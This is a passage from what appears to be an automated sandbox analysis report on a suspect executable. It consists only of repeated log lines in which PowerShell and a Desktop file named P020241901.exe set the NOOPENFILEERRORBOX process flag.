                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
